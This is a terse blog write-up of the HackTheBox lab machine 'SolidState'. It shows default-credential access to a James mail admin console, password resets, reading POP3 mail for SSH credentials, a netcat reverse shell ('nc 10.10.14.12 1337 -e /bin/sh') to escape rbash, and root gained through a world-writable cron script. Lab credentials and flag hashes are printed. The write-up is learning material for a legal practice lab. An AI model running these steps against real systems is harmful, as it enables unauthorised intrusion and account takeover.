This page looks best with JavaScript enabled

SolidState

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

IP: 10.10.10.51


Recon

nmap(fast)
nmap(big)

Possible username: webadmin@solid-state-security.com

https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7

https://blog.mailtrap.io/how-to-test-smtp-server/

telnet 10.10.10.51 4555

root
root
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword <username> <new pw>

https://www.123-reg.co.uk/support/servers/how-can-i-use-telnet-to-test-my-pop3-e-mail-account-is-working-on-my-dedicated-server/

telnet 10.10.10.51 110
user john
pass asdfghj

https://electrictoolbox.com/pop3-commands/

john -> top 1 1

telnet ip 110
user mindy
pass asdfghj
list
top 2 20

Got ssh creds

mindy:P@55W0rd1!2@

  • log in

user.txt

914d0a4ebc177889b5b89a23f556fd75

Privesc

users(/etc/passwd):

james
mindy
root
  • We are in rbash so we must exit/upgrade it to a normal shell!

Exiting rbash

https://github.com/Elinpf/OSCP-survival-guide

ssh mindy@10.10.10.51 nc 10.10.14.12 1337 -e /bin/sh
  • run linpeas

/opt/tmp.py is 777

download it -> edit it locally -> upload to /dev/shm -> copy to /opt/tmp.py instead of mving cuz we dont have enough priv to write inside /opt

wait!

Got root

b4c9723a28899b1c45db281d99cc87c9
Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z